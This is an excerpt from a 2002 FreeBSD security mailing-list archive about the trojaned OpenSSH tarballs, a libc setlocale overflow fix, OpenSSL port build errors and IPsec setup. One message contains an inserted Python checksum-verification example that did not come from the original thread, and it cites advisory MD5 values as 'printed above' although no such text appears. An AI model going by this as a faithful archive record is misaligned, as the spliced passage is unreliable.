src/lib/libc/locale setlocale.c] Message-ID: <20020802011225.GA6411@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please file a security advisory for this fix (first part). That original BSD code bug can be exploitable.
----- Forwarded message from "Andrey A. Chernov" ----- Date: Thu, 1 Aug 2002 18:04:49 -0700 (PDT) From: "Andrey A. Chernov" Subject: cvs commit: src/lib/libc/locale setlocale.c To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org ache 2002/08/01 18:04:49 PDT Modified files: lib/libc/locale setlocale.c Log: Prevent out of bounds writing for the too many slashes case. Replace strncpy + ='\0' with strlcpy MFC after: 1 day Revision Changes Path 1.35 +10 -14 src/lib/libc/locale/setlocale.c ----- End forwarded message ----- -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 20:12: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 401B037B400 for ; Thu, 1 Aug 2002 20:12:01 -0700 (PDT) Received: from switchblade.cyberpunkz.org (switchblade.cyberpunkz.org [198.174.169.125]) by mx1.FreeBSD.org (Postfix) with ESMTP id A342543E42 for ; Thu, 1 Aug 2002 20:12:00 -0700 (PDT) (envelope-from rob@switchblade.cyberpunkz.org) Received: from switchblade.cyberpunkz.org (rob@localhost [127.0.0.1]) by switchblade.cyberpunkz.org (8.12.5/8.12.3) with ESMTP id g723Bsge088934 for ; Thu, 1 Aug 2002 23:11:59 -0400 (EDT) (envelope-from rob@switchblade.cyberpunkz.org) Posted-Date: Thu, 1 Aug 2002 23:11:59 -0400 (EDT) Received: (from rob@localhost) by switchblade.cyberpunkz.org (8.12.5/8.12.3/Submit) id g723BriN085947 for freebsd-security@FreeBSD.ORG; Thu, 1 Aug 2002 23:11:53 -0400 (EDT) (envelope-from rob) Date: Thu, 1 Aug 2002 23:11:53 -0400 From: Rob Andrews To: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution (fwd) Message-ID: <20020802031153.GB74929@switchblade.cyberpunkz.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature";
boundary="zYM0uCDKw75PZbzx" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --zYM0uCDKw75PZbzx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable .- - - - - - Dag-Erling Smorgrav wrote (2002/08/01 at 09:02:48 PM) - - - - - - | |> Chris Miller writes: |> > Are we affected by this? I couldn't find bf-test.c in the openssh |> > directory in /usr/ports. I'm assuming that since the part of the automagic |> > process of building the port involves checking the checksum that we are |> > safe, but I thought it best to ask. |> |> We're safe. |> Technically, yes, provided system maintainers did not install openssh during the time period the trojaned tarballs were available and didn't decide to force the software to install on the system when the md5 checksum failed to match. During the period openssh was trojaned I was doing system upgrades and rebuilding openssh as well with updated libraries. As a rule I never force software to install if the md5 checksum fails. Some people ignore this and install anyway. -- Rob Andrews RELI Networks, Inc.
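The checksum gate that this thread keeps coming back to (the ports framework refusing to build when the distfile does not match distinfo, and the CERT advice to trust digests rather than file sizes or timestamps), written out as an added example. This is not code from the FreeBSD ports tree, from the CERT advisory or from any poster; it is illustration only. The MD5 values in ADVISORY_MD5 and TROJAN_MD5 are the ones printed in CA-2002-24 above; the "MD5 (file) = hex" layout follows the distinfo files of the time; the stand-in distfile name and bytes written by demo() are constructed.

```python
"""Verify downloaded distfiles against a FreeBSD-style distinfo list.

Added example for the CA-2002-24 thread; not ports-framework code. The
digests below are the ones published in the advisory, the distinfo
layout is the "MD5 (file) = hex" form ports used in 2002, and the sample
distfile created by demo() is constructed for illustration.
"""
import hashlib
import os
import re
import tempfile

# MD5 sums CERT published for the uncompromised OpenSSH files.
ADVISORY_MD5 = {
    "openssh-3.4p1.tar.gz": "459c1d0262e939d6432f193c7a4ba8a8",
    "openssh-3.4p1.tar.gz.sig": "d5a956263287e7fd261528bb1962f24c",
    "openssh-3.4.tgz": "39659226ff5b0d16d0290b21f67c46f2",
    "openssh-3.2.2p1.tar.gz": "9d3e1e31e8d6cdbfa3036cb183aa4a01",
    "openssh-3.2.2p1.tar.gz.sig": "be4f9ed8da1735efd770dc8fa2bb808a",
}
# MD5 sum CERT reported for one trojaned openssh-3.4p1.tar.gz.
TROJAN_MD5 = {"3ac9bc346d736b4a51d676faa2a08a57": "openssh-3.4p1.tar.gz"}

# One "MD5 (file) = hex" line per distfile; anything else is rejected.
DISTINFO_RE = re.compile(r"^MD5 \((?P<name>[^()\s]+)\) = (?P<md5>[0-9a-f]{32})$")


def parse_distinfo(text):
    """Return {filename: md5} from distinfo text, rejecting malformed lines."""
    sums = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = DISTINFO_RE.match(line)
        if m is None:
            raise ValueError("distinfo line %d is malformed: %r" % (lineno, raw))
        sums[m.group("name")] = m.group("md5")
    return sums


def format_distinfo(sums):
    """Inverse of parse_distinfo: the text a maintainer's 'make makesum' records."""
    return "".join("MD5 (%s) = %s\n" % (n, sums[n]) for n in sorted(sums))


def md5_file(path):
    """Stream the file through MD5 so a large distfile need not fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_distfile(path, expected):
    """Classify one distfile as 'ok', 'trojan' or 'mismatch'.

    Only the digest is consulted. Size and mtime are ignored on purpose:
    the advisory says they do not identify the trojaned tarball, and an
    attacker who replaced the file on a mirror controls both anyway.
    """
    actual = md5_file(path)
    if actual == expected:
        return "ok"
    if actual in TROJAN_MD5:
        return "trojan"
    return "mismatch"


def verify_distfiles(distdir, sums, force=False):
    """Check every file named in sums under distdir; return {name: status}.

    Any status other than 'ok' raises unless force is set. force is the
    equivalent of overriding the ports checksum, which is exactly the step
    the thread warns against.
    """
    results = {}
    for name, expected in sums.items():
        path = os.path.join(distdir, name)
        results[name] = "missing" if not os.path.isfile(path) else check_distfile(path, expected)
        if results[name] != "ok" and not force:
            raise RuntimeError("%s: %s, refusing to build" % (name, results[name]))
    return results


def demo():
    """Constructed run: record sums, verify, tamper with the file, verify again."""
    with tempfile.TemporaryDirectory() as distdir:
        name = "example-1.0.tar.gz"  # constructed stand-in distfile, not a real tarball
        path = os.path.join(distdir, name)
        with open(path, "wb") as f:
            f.write(b"\x1f\x8b" + b"constructed tarball bytes" * 100)
        sums = parse_distinfo(format_distinfo({name: md5_file(path)}))
        before = verify_distfiles(distdir, sums)
        with open(path, "ab") as f:  # the kind of edit a compromised mirror delivers
            f.write(b"\n# injected build-time payload\n")
        try:
            verify_distfiles(distdir, sums)
            strict = "accepted"
        except RuntimeError:
            strict = "refused"
        forced = verify_distfiles(distdir, sums, force=True)
        return before[name], strict, forced[name]


if __name__ == "__main__":
    print(demo())
```

Running demo() gives ("ok", "refused", "mismatch"): the untouched file passes, the edited one is refused by default, and only the forced run reports the mismatch without stopping, which is the situation Rob Andrews describes when someone overrides a failed checksum. A digest check like this only tells you the file is the one the maintainer recorded; the detached PGP signature the advisory mentions is what ties that file to the OpenSSH release key, so check both.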
--zYM0uCDKw75PZbzx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Sfh5AXwJ9YLqJJURAlxzAJ42O1XrGfXZpoFH3BCfJ3jbWostxgCfS4oG u2GukH1r6AQpOgFyk9M7fQU= =0wQ9 -----END PGP SIGNATURE----- --zYM0uCDKw75PZbzx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 20:49:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4B81537B400 for ; Thu, 1 Aug 2002 20:49:18 -0700 (PDT) Received: from hackmania.net (hssxsk206-163-232-166.sasknet.sk.ca [206.163.232.166]) by mx1.FreeBSD.org (Postfix) with ESMTP id 465CA43E5E for ; Thu, 1 Aug 2002 20:49:17 -0700 (PDT) (envelope-from normal@hackmania.ath.cx) Received: from effortnix (hssxsk206-163-232-165.sasknet.sk.ca [206.163.232.165]) by hackmania.net (8.12.5/8.12.5) with SMTP id g723PBcf000612 for ; Thu, 1 Aug 2002 21:25:11 -0600 (CST) Message-ID: <001101c239d7$7c9d4a30$a5e8a3ce@effortnix> From: "normal" To: References: <200208011205.04188.gobinau@digitalcelt.com> Subject: Re: openssl build Date: Thu, 1 Aug 2002 21:48:38 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yeah, I've run into this problem too :-( I ended up with 50 extra symlinks (i installed a new perl, it ended going into /usr/local when openssl was looking in /usr), I just copied all the binaries to where they belong. 
I'm sure more people will/have run into this problem. Any ideas besides mine will be great. http://www.hackmania.net - ----- Original Message ----- From: "Reuben A. Popp" To: Sent: Thursday, August 01, 2002 11:04 AM Subject: openssl build > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi all, > > I've run into a small conundrum, while building the recent port of > openssl ((openssl-0.9.6e). It appears that the build works fine, > except to the point where it begins to install the man pages. The > following is my error snippet. This box is running 4.6-STABLE if > that helps any. And now, the snippet: > > making all in apps... > making all in test... > making all in tools... > created directory `/usr/openssl' > created directory `/usr/openssl/man' > created directory `/usr/openssl/man/man1' > created directory `/usr/openssl/man/man3' > created directory `/usr/openssl/man/man5' > created directory `/usr/openssl/man/man7' > installing man1/CA.pl.1 > /usr/bin/pod2man does not work properly ('MultilineTest' failed). > Looking for another pod2man ... > Can't locate Pod/Man.pm in @INC (@INC contains: > /usr/local/lib/perl5/site_perl/5.005/i386-freebsd > /usr/local/lib/perl5/site_perl/5.005 . > /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503) at > /usr/local/bin/pod2man line 16. > BEGIN failed--compilation aborted at /usr/local/bin/pod2man line > 16. *** Error code 2 > > Stop in /usr/ports/security/openssl/work/openssl-0.9.6e. > *** Error code 1 > > Stop in /usr/ports/security/openssl. > [gobinau@www (/usr/ports/security/openssl)] (10:32:56)# > > Thanks in advance for any insight/suggestions :D > > .. > With threats of gas and rose motif > Their lips apart like a swollen rose > Their tongues extend, and then retract > A redcap, a redcap, before the kiss, before the kiss. > .. 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.7 (FreeBSD)
>
> iD8DBQE9SWo3l5MJ0L8ObVoRAup5AJsHGVLDKehkJudCiBl53xDUOHvx6wCfX74A
> 1aiKX2B72BJHpzK2J2nkuNY=
> =Pnek
> -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use
Comment: https://www.hackmania.ath.cx

iQA/AwUBPUoBEmuqlDKIknpUEQIkQACg/c1BULmLdRO04ddC1I8vk9Q83ocAnjBK
rJCw8wvnb1GcWXjIt+HMQnit
=2rds
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Aug 1 20:58:29 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7816D37B401 for ; Thu, 1 Aug 2002 20:58:23 -0700 (PDT)
Received: from hackmania.net (hssxsk206-163-232-166.sasknet.sk.ca [206.163.232.166]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2F49043E72 for ; Thu, 1 Aug 2002 20:56:02 -0700 (PDT) (envelope-from normal@hackmania.ath.cx)
Received: from effortnix (hssxsk206-163-232-165.sasknet.sk.ca [206.163.232.165]) by hackmania.net (8.12.5/8.12.5) with SMTP id g723VFcf000767; Thu, 1 Aug 2002 21:31:15 -0600 (CST)
Message-ID: <002301c239d8$559236c0$a5e8a3ce@effortnix>
From: "normal"
To: , , "Christopher Schulte"
References: <5.1.1.6.2.20020801120928.044f1d88@localhost>
Subject: Re: openssl build
Date: Thu, 1 Aug 2002 21:54:42 -0600
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Yeah,
after doing what Mr. Schulte said I get

Can't locate Getopt/Long.pm in @INC (@INC contains: /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/local/lib/perl5/site_perl/5.005 .) at ../util/pod2man.pl line 308.
BEGIN failed--compilation aborted at ../../util/pod2man.pl line 308.
*** Error code 2

----- Original Message -----
From: "Christopher Schulte"
To: ;
Sent: Thursday, August 01, 2002 11:11 AM
Subject: Re: openssl build

> At 12:04 PM 8/1/2002 -0500, Reuben A. Popp wrote:
> >/usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking
> >for another pod2man ...
> >Can't locate Pod/Man.pm in @INC (@INC contains:
>
> Are you using /usr/local/bin/pod2man (maybe from a perl5.6 install?) versus
> /usr/bin/pod2man? If so, give /usr/bin/pod2man a whirl.
>
> --
> Christopher Schulte
> http://www.schulte.org/
> Do not un-munge my @nospam.schulte.org
> email address. This address is valid.

From owner-freebsd-security Thu Aug 1 22:02:15 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2B46C37B400 for ; Thu, 1 Aug 2002 22:02:12 -0700 (PDT)
Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2FBE943E42 for ; Thu, 1 Aug 2002 22:02:11 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp)
Received: from [192.168.1.8] (FLA9Aaa001.chb.mesh.ad.jp [61.193.68.129]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id OAA11408; Fri, 2 Aug 2002 14:02:09 +0900 (JST)
Date: Fri, 02 Aug 2002 14:02:06 +0900
From: Shunichi Konno
To: security@freebsd.org
Subject: Re: openssl build
In-Reply-To: <200208011205.04188.gobinau@digitalcelt.com>
References: <200208011205.04188.gobinau@digitalcelt.com>
Message-Id: <20020802134227.98FE.KONNO@hal.rcast.u-tokyo.ac.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-2022-JP"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.05.03
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

It is because the Makefile tests /usr/local/bin/pod2mantest with Perl 5.6 (/usr/local/bin/perl), but the Makefile runs pod2mantest with Perl 5.005_03 (/usr/bin/perl). This is the main reason, and we will have such a problem only if we have Perl 5.6 in our path.

The workaround is to take /usr/local/bin out of your path temporarily. If the pod2mantest test with /usr/bin/pod2man fails and there is no other pod2man in your path, it will return the pod2man.pl Perl script that is distributed with the OpenSSL package, and it works fine:

    % cd /usr/ports/security/openssl/work/openssl-0.9.6e/util
    % ./pod2mantest ignore
    /usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking for another pod2man ...
    No working pod2man found. Consider installing a new version.
    As a workaround, we'll use a bundled old copy of pod2man.pl.
    ../../util/pod2man.pl

The best way to solve our problem is to fix the Makefile or pod2mantest, but I don't have enough time today. I've not fixed it yet.

Thanks.

On Thu, 1 Aug 2002 12:04:45 -0500
"Reuben A. Popp" wrote:

RAP> installing man1/CA.pl.1
RAP> /usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking for
RAP> another pod2man ...
RAP> Can't locate Pod/Man.pm in @INC (@INC contains:
RAP> /usr/local/lib/perl5/site_perl/5.005/i386-freebsd
RAP> /usr/local/lib/perl5/site_perl/5.005 . /usr/libdata/perl/5.00503/mach
RAP> /usr/libdata/perl/5.00503) at /usr/local/bin/pod2man line 16.
RAP> BEGIN failed--compilation aborted at /usr/local/bin/pod2man line 16.
RAP> *** Error code 2
RAP>
RAP> Stop in /usr/ports/security/openssl/work/openssl-0.9.6e.
RAP> *** Error code 1
RAP>
RAP> Stop in /usr/ports/security/openssl.

今野 俊一 / KONNO Shunichi
The University of Tokyo (IPC, Grad Sch of Inf Sci & Tech)
E-Mail: konno@hal.rcast.u-tokyo.ac.jp
HomePage: http://www.hal.rcast.u-tokyo.ac.jp/~konno/

From owner-freebsd-security Fri Aug 2 02:45:56 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 89A2137B400 for ; Fri, 2 Aug 2002 02:45:53 -0700 (PDT)
Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id C9FCA43E5E for ; Fri, 2 Aug 2002 02:45:51 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org)
Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g729jM5H006826 for ; Fri, 2 Aug 2002 11:45:23 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
X-MDaemon-Deliver-To:
Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g729jLhd006814 for ; Fri, 2 Aug 2002 11:45:21 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
To: freebsd-security@FreeBSD.ORG
Message-ID: <5VuZasl8L8@dmeyer.dinoex.sub.org>
From: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Organization: privat
Subject: Re: About the openssl hole
Date: Fri, 02 Aug 2002 11:39:47 +0200
X-Mailer: Dinoex 1.79
References: <3D47402F.83B37CBA@pantherdragon.org>
X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94]
X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12
X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved.
X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D
X-ZC-VIA: 20020802000000S+2@dinoex.sub.org
X-Accept-Language: de,en
X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail.
X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster.
X-No-Archive: yes
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

patpro wrote:
> If I just :
> - update openSSL port
> - recompile every port that use openSSL (openSSH, Apache+mod_ssl, ....)
> will I be safe from remote attack ?

openSSH, Apache+mod_ssl, .... work fine. Every port that includes Makefile.ssl will use the port version. You can check it with ldd: libcrypto.3 or libssl.3 are used. Some ports will still link with the base versions; there are open PRs about it ...

kind regards Dirk

- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]

From owner-freebsd-security Fri Aug 2 04:57:45 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6B6A137B400 for ; Fri, 2 Aug 2002 04:57:39 -0700 (PDT)
Received: from buckley.rt.net.tr (buckley.rt.net.tr [212.65.128.19]) by mx1.FreeBSD.org (Postfix) with SMTP id B3F9943E42 for ; Fri, 2 Aug 2002 04:57:37 -0700 (PDT) (envelope-from ismail@o2.net.tr)
Received: (qmail 3832 invoked by uid 1010); 2 Aug 2002 11:50:45 -0000
Received: from unknown (HELO o2.net.tr) (ismail@o2.net.tr@212.65.128.101) by buckley.rt.net.tr with SMTP; 2 Aug 2002 11:50:45 -0000
Message-ID: <3D4AFE83.3040800@o2.net.tr>
Date: Fri, 02 Aug 2002 14:49:55 -0700
From: Ismail YENIGUL
User-Agent:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: tr, en-us, en
MIME-Version: 1.0
To: normal
Cc: security@FreeBSD.ORG
Subject: Re: openssl build
References: <200208011205.04188.gobinau@digitalcelt.com> <001101c239d7$7c9d4a30$a5e8a3ce@effortnix>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

hi

The Pod module is used only for the openssl docs installation. Remove the "install_docs" value from Makefile line 632. Normally it looks like the following:

    install: all install_docs

This should be:

    install: all

regards
Ismail YENIGUL
http://www.enderunix.org

normal wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Yeah, I've run into this problem too :-( I ended up with 50 extra
> symlinks (I installed a new perl, it ended up going into /usr/local when
> openssl was looking in /usr), I just copied all the binaries to where
> they belong. I'm sure more people will/have run into this problem.
> Any ideas besides mine will be great.
>
> http://www.hackmania.net
>
> - ----- Original Message -----
> From: "Reuben A. Popp"
> To:
> Sent: Thursday, August 01, 2002 11:04 AM
> Subject: openssl build
From owner-freebsd-security Fri Aug 2 05:03:21 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD63637B484 for ; Fri, 2 Aug 2002 05:03:16 -0700 (PDT)
Received: from ws1-4.us4.outblaze.com (205-158-62-50.outblaze.com [205.158.62.50]) by mx1.FreeBSD.org (Postfix) with SMTP id 8D2D643E8A for ; Fri, 2 Aug 2002 05:02:11 -0700 (PDT) (envelope-from mewtwo@catlover.com)
Received: (qmail 26903 invoked by uid 1001); 31 Jul 2002 11:48:28 -0000
Message-ID: <20020731114828.26902.qmail@mail.com>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Received: from [192.9.200.182] by ws1-4.us4.outblaze.com with http for mewtwo@catlover.com; Wed, 31 Jul 2002 19:48:28 +0800
From: "Security Officer"
To: freebsd-security@freebsd.org
Date: Wed, 31 Jul 2002 19:48:28 +0800
Subject: [Q] FreeBSD IPSec Discussion.
X-Originating-Ip: 192.9.200.182
X-Originating-Server: ws1-4.us4.outblaze.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello. Can anyone tell me which is the most appropriate list to discuss FreeBSD IPSec configuration and interoperability problems (n.b. not freebsd-hackers)? I can't seem to locate a list. Or is it all so simple no one ever has any questions?

--
From owner-freebsd-security Fri Aug 2 06:04:17 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AABE437B400; Fri, 2 Aug 2002 06:04:14 -0700 (PDT)
Received: from musique.teaser.net (musique.teaser.net [213.91.2.11]) by mx1.FreeBSD.org (Postfix) with ESMTP id B0DB943E3B; Fri, 2 Aug 2002 06:04:13 -0700 (PDT) (envelope-from e-masson@kisoft-services.com)
Received: from notbsdems.nantes.kisoft-services.com (chantilly.kisoft-services.com [193.56.60.242]) by musique.teaser.net (Postfix) with ESMTP id 4DDFD7250B; Fri, 2 Aug 2002 15:04:12 +0200 (CEST)
Received: by notbsdems.nantes.kisoft-services.com (Postfix, from userid 1001) id BBD155ADB9; Fri, 2 Aug 2002 14:56:39 +0200 (CEST)
To: "Crist J. Clark"
Cc: Matthew Grooms , dlavigne6@cogeco.ca, Mailing List FreeBSD Security
Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...]
References: <20020730074813.GF89241@blossom.cjclark.org> <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com>
From: Eric Masson
In-Reply-To: <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com> (Eric Masson's message of "Fri, 02 Aug 2002 09:44:08 +0200")
X-Operating-System: FreeBSD 4.6-STABLE i386
Date: Fri, 02 Aug 2002 14:56:39 +0200
Message-ID: <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com>
Lines: 38
User-Agent: Gnus/5.090007 (Oort Gnus v0.07) XEmacs/21.4 (Common Lisp, i386--freebsd)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>>>>> "Emss" == Eric Masson writes:
>>>>> "Crist" == Crist J Clark writes:

Follow-up to myself and -security re-added.

Crist> I've never figured out why people use gif(4) interfaces when ESP
Crist> does the tunneling for you.

Emss> Maybe because I've never succeeded in establishing an ESP tunnel
Emss> between two LANs without gif(4).

I've tried without a gif tunnel (erroneous rc.conf modification) and it works; maybe Murphy's law had prevented this before ;)

There's one question still remaining:
- if there is more than one ESP tunnel configured, how is traffic routed?

Example:
- One ESP tunnel from 192.168.0.1 to 10.93.0.1
- One ESP tunnel from 192.168.0.1 to 10.44.0.1

With only one tunnel configured, netstat -rn on the security gateway doesn't show any routes to the remote networks nor host. With a second tunnel added, are there any additional configuration steps, or will the kernel do the routing automagically?

Links or example setup if needed?

Thanks in advance

Eric Masson

--
In short, I've read some real nonsense on fufe, I've even written some, but this one is flirting with the blue ribbon.
-+- RM in : - That deserves the blue GNUban -+-

From owner-freebsd-security Fri Aug 2 06:41:07 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E97CC37B400 for ; Fri, 2 Aug 2002 06:41:03 -0700 (PDT)
Received: from femme.sapphite.org (pcp02268182pcs.longhl01.md.comcast.net [68.50.99.190]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9994D43E3B for ; Fri, 2 Aug 2002 06:40:59 -0700 (PDT) (envelope-from trish@listmistress.org)
Received: from femme.sapphite.org (trish@localhost [127.0.0.1]) by femme.sapphite.org (8.12.5/8.12.5) with ESMTP id g72DecmQ005652; Fri, 2 Aug 2002 09:41:59 -0400 (EDT) (envelope-from trish@listmistress.org)
Received: from localhost (trish@localhost) by femme.sapphite.org (8.12.5/8.12.5/Submit) with ESMTP id g72DebY9005649; Fri, 2 Aug 2002 09:40:37 -0400 (EDT)
X-Authentication-Warning: femme.sapphite.org: trish owned process doing -bs
Date: Fri, 2 Aug 2002 09:40:36 -0400 (EDT)
From: Trish Lynch
X-X-Sender:
To: Security Officer
Cc:
Subject: Re: [Q] FreeBSD IPSec Discussion.
In-Reply-To: <20020731114828.26902.qmail@mail.com>
Message-ID: <20020802093902.K497-100000@femme.sapphite.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jul 2002, Security Officer wrote:

> Hello. Can anyone tell me which is the most
> appropriate list to discuss FreeBSD IPSec
> configuration and interoperability problems
> (n.b. not freebsd-hackers)? I can't seem to
> locate a list. Or is it all so simple no one
> ever has any questions?

No, it's so complicated that nobody has the answers :)

Here or -questions would most likely be the best place.
I just recently learned a hell of a lot about KAME/racoon by trial and error over the past couple of weeks, including interop issues with other vendors' software/hardware (specifically Ravlins), so if I can help, I'll attempt to.

-Trish

--
Trish Lynch           trish@bsdunix.net
FreeBSD               The Power to Serve
Ecartis Core Team     trish@listmistress.org
http://www.freebsd.org

From owner-freebsd-security Fri Aug 2 08:02:59 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4B5F037B400; Fri, 2 Aug 2002 08:02:52 -0700 (PDT)
Received: from mail.seton.org (mail.seton.org [207.193.126.172]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8703C43E6A; Fri, 2 Aug 2002 08:02:51 -0700 (PDT) (envelope-from mgrooms@seton.org)
